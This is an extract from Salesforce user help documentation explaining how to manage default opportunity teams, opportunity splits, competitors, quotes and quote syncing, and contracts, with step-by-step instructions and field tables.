• Deleting Members from Your Default Opportunity Team

See Also:
Opportunity Teams Overview
Adding Your Default Opportunity Team

Adding Members to Your Default Opportunity Team
Your default opportunity team should include the users that you normally work with on your opportunities.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on opportunitiesTo set default opportunity team:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select My Personal Information > Advanced User Details.

3. In the Default Opportunity Team related list, click Add.
4. Select users to add as members of your default opportunity team.
5. Select the access that each opportunity team member has on your opportunities. The access level can’t be less than your

organization’s default opportunity sharing access.
6. Select an opportunity team role for each member, for example, Account Manager.
7. To add your default opportunity team to all opportunities that you create and all open opportunities that are transferred

to you, select Automatically add my default opportunity team.... The opportunity team on closed
opportunities that are transferred to you isn’t affected by this option.

8. To apply the default opportunity team changes to all your existing open opportunities, select Update open opportunity
teams.... Closed opportunities are not affected.

9. Click Save.

See Also:
Opportunity Team Fields
Adding Your Default Opportunity Team
Adding Members to an Opportunity Team
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Editing Members in Your Default Opportunity Team

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on opportunitiesTo set default opportunity team:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select My Personal Information > Advanced User Details.

3. Next to the user’s name in the Default Opportunity Team related list, click Edit.
4. Change the access level or the role for a team member. The access level can’t be less than your organization’s default

opportunity sharing access.

• To add your default opportunity team to all opportunities that you create and all open opportunities that are transferred
to you, select Automatically add my default opportunity team.... The opportunity team on closed
opportunities that are transferred to you isn’t affected by this option.

• To apply the default opportunity team changes to all your existing open opportunities, select Update open
opportunity teams.... Closed opportunities are not affected.

5. Click Save.
6. To change an opportunity team member for a specific opportunity, go to the Opportunity Team related list on that

opportunity.

See Also:
Opportunity Team Fields

Deleting Members from Your Default Opportunity Team

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on opportunitiesTo set default opportunity team:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.
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2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select My Personal Information > Advanced User Details.

3. Next to the user’s name in the Default Opportunity Team related list, click Del.
4. To remove the user’s team membership from your existing open opportunities, select Remove this user.... Closed

opportunities are not affected.
5. Click Delete.
6. To remove an opportunity team member for a specific opportunity, go to the Opportunity Team related list on that

opportunity.

See Also:
Deleting Members from an Opportunity Team

Adding Your Default Opportunity Team

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on opportunitiesTo set up default opportunity teams:

“Read” on opportunities

AND

Owner of opportunity record, or above owner in your
organization's role hierarchy

To add default opportunity teams to opportunities:

There are two ways to include your default opportunity team on the opportunities you own.

• When adding members to your default opportunity team, you can choose to automatically add the team to all of your open
opportunities. See Adding Members to Your Default Opportunity Team.

• You can add your default opportunity team to each of your opportunities individually.

1. View the opportunity and navigate to the Opportunity Team related list.
2. Click Add Default Team.

1136

Setting Your Default Opportunity TeamManaging Activities, Opportunities, and Products



Note:  Administrators and users above you in the role hierarchy can add your default opportunity team to
opportunities you own. Clicking Add Default Team adds the default team of the opportunity owner, not of the
user who clicks the button.

See Also:
Opportunity Teams Overview
Setting Your Default Opportunity Team

Opportunity Team Fields

Available in: Enterprise, Unlimited, and Developer Editions

DescriptionField

The level of access that a team member has to the opportunity.
The access level can be read/write or read only, but it can’t be
less than your organization’s default opportunity sharing access.

Opportunity Access

The role that the team member plays for the opportunity, for
example, “Account Manager.”

Team Role

The user listed as part of the team. If the partner portal is
enabled, choose whether the team member is a Partner User
or User.

User

See Also:
Adding Members to an Opportunity Team
Adding Members to Your Default Opportunity Team

Opportunity Splits Overview
Opportunity splitting lets you share sales credit across an opportunity team.

Available in: Enterprise, Unlimited, and Developer Editions

Watch a Demo (1:44 minutes)

Opportunity splitting lets users share credit across opportunity team members. Multiple team members working on an
opportunity can roll their individual sales credits into quota and pipeline reports for the entire team.
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Note:  To view and edit splits, you must be the opportunity owner or above in the organization hierarchy.

There are two types of opportunity splits.

Revenue splits provide credit to team members who are directly responsible for revenue that an opportunity generates. Revenue
splits must total 100% of the opportunity amount.

Overlay splits provide credit to team members who work on an opportunity but aren’t directly responsible for generated revenue.
Because these splits aren’t limited by the opportunity amount, they can total any percentage (sometimes exceeding 100%).

Note:  Opportunity splits can’t be rolled up to sales territories or forecasts.

See Also:
Enabling Team Selling
Enabling Opportunity Splits
Creating Opportunity Splits

Creating Opportunity Splits
Share sales credit with revenue and overlay splits.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunities

AND

Owner of opportunity record, or above owner in organization
hierarchy

To add splits for opportunity team members:

If team selling and opportunity splits are enabled for your organization, you can edit splits for opportunity team members.

1. Open an existing opportunity or create a new one. The opportunity owner is automatically included in the opportunity
team and assigned a 100% revenue split by default.

2. In the Opportunity Split related list, click Edit Opportunity Splits.

Note:  If you don’t see the related list, ask your administrator to edit the setup options for Opportunity Splits.

3. Add appropriate opportunity team members, and adjust their split percentages. Revenue splits must total 100%, but overlay
splits can total any percentage.

4. Click Save.
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Note:  Split percentages are limited to two decimal places. If you enter a monetary amount that requires a split
percentage with three decimal places or more, the amount is automatically rounded.

See Also:
Opportunity Splits Overview
Reassigning Team Members on Multiple Records

KNOWING YOUR COMPETITORS

Competitors Overview
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

You can track competitors in a pending sale by listing the competitors’ names in the opportunity. You can enter the names of
new competitors, or choose from a list of competitors defined by your administrator. To access this information, go to the
Competitors related list of the opportunity.

See Also:
Defining Competitors
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Defining Competitors
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Customize Application”To define competitors:

Create a picklist of competitors that your users can attach to opportunities. To add competitors to the picklist:

1. From Setup, click Customize > Opportunities > Competitors.
2. Click New to add competitor names to the list.
3. Enter the name of the competitor.
4. Optionally, check the default option to select this value on any new record when another value is not selected.
5. Click Save.

See Also:
Competitors Overview
Viewing and Editing Competitors

Viewing and Editing Competitors
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view competitors:

“Edit” on opportunitiesTo edit competitors:

The Competitors related list of an opportunity shows the competitors for that deal.

• To view information for a competitor, click the competitor’s name.
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• Click Edit next to a competitor’s name to edit the strengths and weaknesses of the competitor for the opportunity.

• To add a competitor, click New. Enter the competitor’s name, or click the lookup icon to select from a list of competitors
defined by your administrator. It does not need to be an existing account or contact. Then specify the strengths and
weaknesses of the competitor, which may be different for each opportunity.

Note:  To add or create a competitor on an opportunity, you must also have access to edit that opportunity.

See Also:
Competitor Fields

Competitor Fields
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

A competitor has the following fields, listed in alphabetical order.

DescriptionField

Name of competitor. You can enter any name, or select from
the list of all competitors defined by your administrator.

Competitor Name

Description of competitor’s key selling points and advantages.Strengths

Description of competitor’s key disadvantages.Weaknesses

See Also:
Defining Competitors
Viewing and Editing Competitors
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Deleting Competitors
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Edit” on opportunitiesTo delete competitors:

You can delete a competitor from the opportunities page by clicking the Del link next to a competitor’s name in the Competitors
related list.

Note:  To delete a competitor from an opportunity, you must also have access to edit that opportunity.

See Also:
Competitors Overview
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CREATING QUOTES AND DOCUMENTING CONTRACTS

QUOTING YOUR PRODUCTS AND SERVICES

Quotes Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on quotes.To view quotes:

“Create” on quotesTo create quotes:

A quote is a record showing proposed prices for products and services. You create a quote from an opportunity and its products.

Each opportunity can have multiple associated quotes, and any one of them can be synced with the opportunity. When a quote
and an opportunity are synced, any change to line items in the quote will sync with products on the opportunity, and vice
versa.

When your quote is complete, you can generate a PDF and email it to your customer. Quote PDFs are based on templates.
We offer a standard template, and you can also create your own.

See Also:
Opportunities Overview
Creating Quotes
Quotes Syncing Overview

1143

Quotes OverviewCreating Quotes and Documenting Contracts



Creating Quotes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on quotes.To view quotes:

“Create” on quotesTo create quotes:

Tip:  You can create a set of quotes to show different combinations of products, discounts, and quantities so customers
can compare prices.

1. Click New Quote on the Quotes related list on an opportunity. The Subtotal, Discount, Total Price, and Grand
Total fields show values from the opportunity.

Note:  The price book, products, and list prices must be active in the opportunity.

2. Enter a quote name.
3. In the Expiration Date field, enter the date when the quote will no longer be valid.
4. Enter taxes and shipping amounts as needed. The currency for these values comes from the opportunity.

For multicurrency organizations, the line item's currency is the same as the currency of the associated opportunity, which
is inherited from the product record. If the product currency is different from the user currency, currency-related fields
display both currencies: the product's currency is converted to the user's currency, and the converted amount appears in
parentheses.

5. Enter a contact name or click the lookup icon ( ) to select a contact. The quote shipping and billing addresses come from
the associated account.

6. Click Save when you're done. When you save a quote:

• A unique quote number is added.
• Any products on the opportunity are copied to the quote as line items.
• The grand total is recalculated based on any taxes or shipping information you entered.

Enterprise, Unlimited, and Developer Edition organizations can activate record types and ask you to choose a Record Type
when creating a record. Record types determine the picklist values and business processes available when you create or edit a
record.

See Also:
Displaying and Editing Quotes
Creating Quote PDFs
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Displaying and Editing Quotes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on quotes

AND

“Read” on Quotes

To change quotes:

Displaying Quotes

From the Quotes related list on an opportunity, click the quote number to display the quote. All quotes associated with
the opportunity appear in this list. If hover details are enabled, hover over any lookup field on the detail page to view
key information about a record before clicking into that record’s detail page.

Editing Quotes

To update a quote, click Edit in any of these areas.
• On the quote detail page.

• Next to the quote in the Quotes related list of an opportunity.

• In the hover details for the quote in the Recent Items list.

Make changes as needed. Note that you can't change which opportunity is associated with the quote. Click Save when
you're done. Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your
administrator.

Related Lists

The related lists on a quote show key information related to the quote, including quote line items and the quote PDFs
that have been created and emailed.
• Hover over the links at the top of a detail page to display the corresponding related list and its records. If Chatter is

enabled, hover links display below the feed. An interactive overlay allows you to quickly view and manage the related
list items. Click a hover link to jump to the content of the related list. If hover links are not enabled, contact your
Salesforce administrator.

• To directly add new items, click New (or the equivalent button) at the top of a related list.

• To change the number of records shown for related lists, click View More below a related list, or click fewer or more
at the bottom of the page.

The related lists you see are determined by your:

• Personal customization

• Administrator's page layout customizations

• Permissions to view related data
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Printing Quotes

To open a printable display of the record details, in the top-right corner of the page, click Printable View.

See Also:
Editing Quote Line Items
Quotes Fields

Adding Line Items to Quotes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on quotes

AND

“Read" on products and price books

To add quote line items:

To add line items to a quote:

1. Click Add Line Item in the Quote Line Items related list.
2. If no price book was selected on the opportunity, select a price book for the quote. Otherwise, the quote uses the opportunity's

price book.
3. Enter search criteria in the lookup to locate a line item.
4. Select the products you want to add and click Select.
5. Enter the correct values in the fields. The sales price defaults to the product's list price as recorded in the price book. The

sales price may be editable depending on your permissions. For multicurrency organizations, the line item's currency is the
same as the currency of the associated opportunity, which is inherited from the product record. If the product currency is
different from the user currency, currency-related fields display both currencies: the product's currency is converted to the
user's currency, and the converted amount appears in parentheses.

6. Click Save to save and exit, or Save & More to add more line items. The line items are added to the Quote Line Items
related list. The grand total in the detail section is the sum of the related line items, and the discount is the average discount
for the line items.

If the product has default schedules, the schedules are not created when you add the line item. If the line item is copied from
the opportunity, you can view the schedule from the opportunity. To change a schedule, edit the product record directly.

Note:

If this quote is synced with an opportunity, the new line item is copied to the opportunity as a product in the Products
related list.
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Using the Quote Line Items Related List

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts (enhanced page layout editor only):

The Quote Line Items related list shows the line items on a quote. If the quote is synced to its related opportunity, any changes
or additions to quote line items are updated in the opportunity's Products related list, and vice versa.

Your administrator can customize the quote line item edit and detail pages you see when you select a line item on a quote.
You can create and customize your own page layouts from Setup by clicking Customize > Quotes > Quote Line Items >
Page Layouts.

Editing Quote Line Items

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on quotes

AND

“Read" on products and price books

To edit or delete quote line items:

To edit a quote line item:

1. Click Edit next to the line item in the Quote Line Items related list. You can also click Edit All to edit all line items at
once.

2. Enter the correct values in the fields. The sales price defaults to the product's list price as recorded in the price book. The
sales price may be editable depending on your user permissions.

For multicurrency organizations, the line item's currency is the same as the currency of the associated opportunity, which
is inherited from the product record. If the product currency is different from the user currency, currency-related fields
display both currencies: the product's currency is converted to the user's currency, and the converted amount appears in
parentheses.

If you have a quote line item that has a discount, you can't edit the Discount field if the product has either a default
schedule established on the product record or an individual schedule established on the opportunity product record.
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3. Click Save. If the quote is synced with an opportunity, the opportunity product that corresponds to the quote line item is
updated with your changes.

Note: If an opportunity is syncing with a quote, and the quote record is locked by an approval process, you can’t edit
the opportunity products.

Deleting Quote Line Items

If the quote is synced with an opportunity, deleting the quote line item also deletes the corresponding product from the
opportunity's Products related list.

To delete a line item:

• Click Del next to the line item in the quote's Quote Line Items related list.
• Click Delete on the quote line item's detail page.

Deleting Quotes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on quotesTo view quote lists:

“Delete” on quotesTo delete quotes:

You can delete a quote if you're an administrator, the quote owner, or a user above the quote owner in the organization role
hierarchy and you have the appropriate permissions.

You can delete a quote from:

• An opportunity—Open an opportunity, and in the Quotes related list, click Del next to the quote.

• The quote detail page—Open the quote and click Delete.

When you delete a quote, all related PDFs, notes, and attachments are deleted. If the quote is synced with an opportunity,
the record is removed from the opportunity's Quotes related list. The deleted quote is moved to the Recycle Bin. If you undelete
a previously synced quote, it will no longer be synced with the opportunity.
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Creating Quote PDFs
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on quotesTo create quote PDFs:

You can generate quote PDFs to print or email to customers. You can generate a quote PDF from either the standard template,
which comes built in, or a custom template you design. Quote PDFs use the language and locale of the running user.

Note:

In some cases, a field may not appear on the quote templates palette or on a PDF created from a template.

• If a user is unable to view or update a field because of field-level security settings, that field won't appear on PDFs
created from a template, even if the template includes that field. Read-only fields will appear on PDFs.

• A field that appears on a quote page layout but does not have a value for a given quote will appear on the quote
templates palette, but won't appear on PDFs created from that quote.

• Quote line item fields that don't contain data won't appear as columns in a list when a PDF is created, even if the
template includes that field. For example, if no quote line items offer a discount, the Discount column won't
appear, even if the list includes the Discount field.

• If a related list is not included on a quote page layout, it won't appear on the template palette or any PDFs for
quotes that use that page layout.

Text fields displayed in a related list in a quote PDF are truncated to less than 256 characters. This limitation occurs
on rich text area fields, other types of text fields, standard fields, and custom fields.

Creating Quote PDFs from the Standard Template

If you haven't created any custom templates or generated any PDFs, you start from the standard template.
1. On the quote detail page, click Create PDF to generate a preview.
2. Click Save to Quote to save the PDF to the Quote PDFs related list. The PDF name is the quote name plus a

version number, such as AcmeQuote_V1.

You can also save and email your quote directly from the preview page.

Creating Quote PDFs by Selecting a Template

If you've already created a PDF, you can select a template from a list of those you've recently used. If you haven't created
a PDF, or you want to use a template that's not listed, you can search for the one you want. The standard template is
always available.
1. On the quote detail page, click the Create PDF drop-down list.
2. Either select your template from the Recent Templates list (if available), or click Choose Template and search

for the one you want.
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Tip:  To bypass the list of recent templates and select a different one, click the Create PDF button on the
quote detail page.

3. Click Create PDF to generate a preview.
4. Click Save to Quote to save the PDF to the Quote PDFs related list. The PDF name is the quote name plus a

version number, such as AcmeQuote_V1.

You can also save and email your quote directly from the preview page.

See Also:
Emailing Quote PDFs

Emailing Quote PDFs
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on quotesTo email quote PDFs:

When you create a quote PDF, you can email it to your customer for approval. The quote must have a status that allows
emailing.

1. Start by generating the email. You can:

• Click Save and Email Quote on the PDF preview.
• Click Email Quote on the quote detail page.
• Click Email next to the PDF in the Quote PDFs related list.

An email task opens with the current quote PDF attached.

Tip:  To email a previous version, click Email next to that version in the Quote PDFs related list.

2. Enter the customer's email address, a subject, and body text, and then click Send.

See Also:
Creating Quote PDFs
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Quotes Fields
Available in: Professional, Enterprise, Unlimited, and Developer Editions

This table lists the fields (in alphabetical order) that make up a quote. Some of these fields may not be visible or editable
depending on your page layout, field-level security settings, or Salesforce edition. (Field-level security is available in Enterprise,
Unlimited, and Developer Editions only.)

Note:  If an opportunity product's currency is different from the user's currency in a multicurrency organization,
currency fields for quotes and quote line items appear in both currencies. the product's currency is converted to the
user's currency, and the converted amount appears in parentheses. Fields in quote custom reports appear in the report's
currency. Currency fields include Subtotal, Tax, and Grand Total.

DescriptionField

Name of account the quote's opportunity is linked to. (Read only)Account Name

Additional address field for use if needed. Not displayed on the page layout
by default.

Additional To

Name of the person or company associated with the additional address.Additional To Name

Billing address for the account associated with the quote.Bill To

Name of the person or company the quote is billed to.Bill To Name

Name of the contact associated with the quote. By default, this is the primary
contact on the opportunity.

Contact Name

User who created the quote and creation date and time. (Read only)Created By

Description of the quote or notes to help you differentiate between quote
versions.

Description

Weighted average of all line item discounts on the quote. Can be any positive
number up to 100.  (Read only)

Discount

Email address of the contact associated with the quote. If available,
automatically filled in when you add a contact.

Email

Date this quote is no longer valid.Expiration Date

Fax number for the contact associated with the quote. If available,
automatically filled in when you add a contact.

Fax

Total price of the quote plus shipping and taxes. (Read only)Grand Total

User who most recently changed the quote and modified date and time. (Read
only)

Last Modified By

Number of line items on the quote.Line Items

Name of the opportunity associated with the quote. (Read only)Opportunity Name
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DescriptionField

Phone number of the contact associated with the quote. If available,
automatically filled in when you add a contact.

Phone

Name of the quote.Quote Name

Automatically-generated number identifying the quote. (Read only)Quote Number

Address to send the quote to for approval, such as the address of a third-party
agency representing a buyer. Not displayed on the page layout by default.

Quote To

Name of the entity (such as a person or business) the quote is sent to for
approval.

Quote To Name

Name of the field that determines what picklist values are available for the
record. The record type may be associated with a sales process. Available in
Enterprise, Unlimited, and Developer Editions.

Record Type

Total shipping and handling costs for the quote.Shipping and Handling

Shipping address for the account associated with the quote.Ship To

Name of the entity (such as a person or company) the quote line items are
shipped to.

Ship To Name

Current status of the quote. The standard options are:Status

• —None—

• Draft

• Needs Review

• In Review

• Approved

• Rejected

• Presented

• Accepted

• Denied

Your administrator determines which status is the default for new quotes and
which statuses allow you to email a quote PDF.

Total of the quote line items before discounts, taxes, and shipping are applied.
(Read only)

Subtotal

Indicates whether the quote syncs with its associated opportunity. (Read
only.)

Syncing

Total taxes for the quote.Tax

Total of the quote line items after discounts and before taxes and shipping.
(Read only)

Total Price

Quote Line Item Fields

This table lists the fields (in alphabetical order) that make up a quote line item.
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DescriptionField

User who created the line item and creation date and time. (Read only)Created By

Service, effective, or other date for the product.Date

Discount you apply to the line item. You can enter a number with or without
the percent symbol and you can use up to two decimal places.

Discount

User who most recently changed the line item and modify date and time.
(Read only)

Last Modified By

Description of the product in the line item.Line Description

Automatically system-generated number that identifies the line item. (Read
only)

Line Item Number

Price of the product within the price book including currency. (Read only)List Price

Name of the line item product as listed in the price book. (Read only)Product

Internal code or product number used to identify the product.Product Code

Number of units of this line item's product included in the quote. Value must
be one or greater. If a quote is synced with an opportunity, this field is updated

Quantity

from the quote line item to the opportunity product. This field also appears
in the Products list on the Opportunity Forecast Edit page, if you use
forecasting for your opportunities (depending on which forecasting version
you use).

Name of the quote the line item is for.Quote Name

Price you currently want to use for the product. Initially, the sale price for a
product added to an opportunity or quote is the product’s list price from the

Sales Price

price book, but you can change it here. If a quote is synced with an
opportunity, this field is updated from the quote line item to the opportunity
product. If a quote is synced with an opportunity, this field is updated from
the quote line item to the opportunity product. This field also appears in the
Products list on the Opportunity Forecast Edit page, if you use forecasting
for your opportunities (depending on which forecasting version you use).

Indicates whether the line item uses schedules in the opportunity. Note that
default schedules are not carried over from the opportunity when opportunity
products are copied to a quote.

Schedule

Line item's sales price multiplied by the quantity.Subtotal

Line item's sales price multiplied by the quantity minus the discount.Total Price

See Also:
Displaying and Editing Quotes
Creating Quotes
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Searching for Quotes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on quotesTo view quotes

Search for quotes by either name or number.

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

Note:  You can only create list views on object tabs. The Quotes object doesn’t have a standard object tab and doesn’t
support custom object tabs.

Quotes Syncing Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Quotes syncing lets you link a quote to the opportunity it was created from and synchronize all updates between the two
records. An opportunity can have multiple quotes, but it can only sync with one quote at a time.

While a quote and an opportunity are synced, any addition or change to the list of products in one record syncs with the list
of products in the other one. So adding a line item to a quote updates the synced opportunity's Products related list, and adding
a product to the opportunity updates the synced quote's Quote Line Items related list. Product sorting also syncs between the
two records. The quote and opportunity continue to sync each way until you stop syncing or delete one of the records.

You can sync quotes and opportunities that don't have any products. When you add a product to either record, it's automatically
added to the record it's synced to.

If an opportunity and a quote are synced, the opportunity identifies the synced quote in two places:

• The Synced Quote field on the Opportunity detail page.

• The Syncing checkbox in the Quotes related list.

If you stop the sync between a quote and an opportunity, the link is broken and the records are no longer automatically updated
with each other's changes.

See Also:
Syncing Quotes and Opportunities

1154

Searching for QuotesQuoting Your Products and Services



Syncing Quotes and Opportunities

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on quotesTo sync quotes:

To sync a quote with an opportunity:

1. Open the quote you want to sync and click Start Sync.
2. In the dialog boxes, click Continue, Sync, then Done.

The quote and the opportunity are now linked for syncing, which takes place any time you add or update a quote line item or
opportunity product. The opportunity's Synced Quote field and Quotes related list identify the quote that's currently synced.

To stop sync between a quote and an opportunity, open the synced quote and click Stop Sync. Updates are no longer synced
between the records.

To sync a different quote with an opportunity, follow the steps for syncing a quote. The previously synced quote stops syncing
and the new quote starts.

See Also:
Troubleshooting Quotes Syncing
Quotes Syncing Overview

Troubleshooting Quotes Syncing

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on quotesTo sync quotes:

You may get error messages if you try to sync quotes under certain conditions. If so, find your error below and learn how to
solve the problem.

This quote can't be synced because it has inactive or archived products.

• If the product isn't active, edit the product and select the Active check box.

• If the product has been archived, delete the product if the opportunity is not closed.
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This quote can't be synced because it has an inactive or archived price book.

• If the price book is inactive, edit the price book and select the Active check box.

• If the price book has been archived, delete the price book if the opportunity is not closed.

This quote can't be synced because it has inactive or archived list prices.

• If the list price isn't active, edit the list price and select the Active check box for the list price.

• If the list price has been archived, delete the list price if the opportunity is not closed.

This quote can't be synced because it has an inactive currency.

Activate the currency from Setup by clicking Company Profile > Manage Currencies.

This quote can't be synced because one or more of the schedules for the opportunity products have changed since
the quote was created.

Either create a new quote and sync that one, or open the product and delete the schedule, then recreate the schedule.

This quote can't be synced because another quote that’s being synced for this opportunity is locked due to a workflow
approval process. Opportunities can only sync with one quote at a time.

To unlock the other quote, either finish the approval process or recall the request for approval.

The SyncedQuote field is read only within a trigger.

Your organization may be using an Apex trigger that is attempting to modify the SyncedQuote field. The SyncedQuote
field is read only and can't be modified with a trigger. Contact your system administrator to modify the trigger.

DOCUMENTING CONTRACTS FOR YOUR ACCOUNTS

Contracts Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

A contract is a written agreement between two or more parties. Many companies use contracts to define the terms for doing
business with other companies.

Use Salesforce to establish and document the contracts you have with your accounts. Then, track the contract through your
organization’s approval process and use workflow alerts to notify yourself when to initiate contract renewals.

See Also:
Contracts Home
Administrator tip sheet: Getting Started with Contracts
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Contracts Home
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on contractsTo view the Contracts tab:

“Read” on contractsTo view contracts:

“Create” on contracts

AND

“Read” on accounts

To create contracts:

Click the Contracts tab to display the contracts home page.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• In the Recent Contracts section, select an option from the drop-down list to display a brief list of the top contracts
matching that criteria. From the list, you can select any contract to go directly to the contract detail. Contract Name
displays in this list if you have added it to your contract page layout. Toggle the Show 25 items and Show 10 items links
to change the number of items that display. The fields you see are determined by the “Contracts Tab” search layout defined
by your administrator and by your field-level security settings (available in Enterprise, Unlimited, and Developer Editions
only). The Recent Contracts options are:

DescriptionRecent Contracts Choice

The last ten or twenty-five contracts you created, with the
most recently created contract listed first. This list only
includes records owned by you.

Recently Created

The last ten or twenty-five contracts you updated, with the
most recently updated contract listed first. This list only
includes records owned by you.

Recently Modified

The last ten or twenty-five contracts you viewed, with the
most recently viewed contract listed first. This list is derived

Recently Viewed

from your recent items and includes records owned by you
and other users.

The last ten or twenty-five contracts that have at least one
approval request awaiting your approval. This list includes
records owned by you and other users.

Approval Pending
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• In the Recent Contracts section, click New to create a new contract.

See Also:
Displaying and Editing Contracts
Considerations for Creating Contracts

Viewing Contract Lists
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on contractsTo view contract lists:

“Create” on contracts

AND

“Read“ on accounts

To create contracts:

The contracts list page displays a list of contracts that match your current view. To show a filtered list of items, select a
predefined list from the View drop-down list, or click Create New View to define your own custom views. To edit or delete
any view you created, select it from the View drop-down list and click Edit.

• Click a contract number to view the detail. Click Edit or Del to edit or delete a contract.

• If Chatter is enabled, click  or  to follow or stop following a contract in your Chatter feed.
• Click New Contract select Contract from the Create New drop-down list in the sidebar to create a contract.

See Also:
Deleting Contracts
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Displaying and Editing Contracts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on contractsTo view contracts:

“Edit” on contracts

AND

“Read” on accounts

To change contracts:

“Activate Contracts”To change activated contracts:

Displaying Contracts

Once you have located a contract on the contracts home or list pages, click the contract number to display detailed
information. From an account, click the contract number in the Contracts related list to display the contract. All contracts
associated with the account are listed in the Contracts related list. If hover details are enabled, hover over any lookup
field on the detail page to view key information about a record before clicking into that record’s detail page.

Viewing Contract Updates and Comments (Chatter)

Display a Chatter feed of updates, comments, and posts about the contract.

Editing Contracts

To update a contract, click Edit, and then change the fields that you want to update. When you have finished, click
Save. You can also select Save & New to save the current contract and create another. Users with the “Edit” permission
on contracts can edit contracts until they are activated. Use inline editing to edit fields directly on the detail page. If
inline editing isn’t enabled, contact your administrator.

Contract Related Lists

The lower portion of the display provides a snapshot of key information relating to the contract. The related lists you
see are determined by your personal customization and by any customization your administrator has made to page layouts
or your permissions to view related data. You can click on individual items to display additional detail. Click more at
the bottom of the page or View More below a related list to display more items. Click New to directly add new items.

Note: Hover over the links at the top of a detail page to display the corresponding related list and its records.
If Chatter is enabled, hover links display below the feed. An interactive overlay allows you to quickly view and
manage the related list items. Click a hover link to jump to the content of the related list. If hover links are not
enabled, contact your Salesforce administrator.

Printing Contracts

To open a printable display of the record details, in the top-right corner of the page, click Printable View.
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To return to the last list page you viewed, click Back to list at the top of the contracts detail page. If your organization has
enabled collapsible page sections, use the arrow icons next to the section headings to expand or collapse each section on the
detail page.

See Also:
Contract Fields
Searching for Contracts

Contract Approval Requests
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The Approval Requests related list on a contract detail page tracks the status of each approval request. This list displays
information about each approval request and includes the status and any approve or reject comments. When the status is
Pending, no comment is included.

Contract History
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The Contract History related list of a contract detail page tracks changes to a contract. The default is to track changes for
contracts with a status of either In Approval Process or Activated. To track changes for contracts with any status, see
Customizing Contract Settings on page 1524.

Any time a user modifies any of the standard or custom fields whose history is set to be tracked on the contract, a new entry
is added to the Contract History related list. All entries include the date, time, nature of the change, and who made the change.
Modifications to the related lists on the contract are not tracked in the contract history.

You can report on activated contracts whose fields are tracked by clicking New Report... on the Reports tab, selecting Contract
Reports as the Report type, and then selecting Contract History.
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Considerations for Creating Contracts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on contractsTo view contracts:

“Create” on contracts

AND

“Read” on accounts

To create contracts:

When creating contract records, you must enter the related account name and select a status. Your system administrator may
have required other fields.

Consider entering the following optional information.

• The start date

• How long the contract will be in effect

• The end date

Note:  Your administrator may have configured Salesforce to calculate Contract End Date based on Contract
Start Date and Contract Term. If Contract End Date is auto-calculated, it won’t display on the contract’s
edit page.

If your organization uses divisions, the division of a new contract is automatically set to the division of the related account.

See Also:
Cloning Contracts
Contracts Home
Contract Fields
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Cloning Contracts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on contractsTo view contracts:

“Create” on contracts

AND

“Read” on accounts

To clone contracts:

The Clone button on a contract quickly creates a new contract with the same information as the existing contract. For example,
you can add multiple contracts for the same account.

Click Clone on an existing contract. Enter or change any information for the new contract and click Save.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Contract Fields

Contract Fields
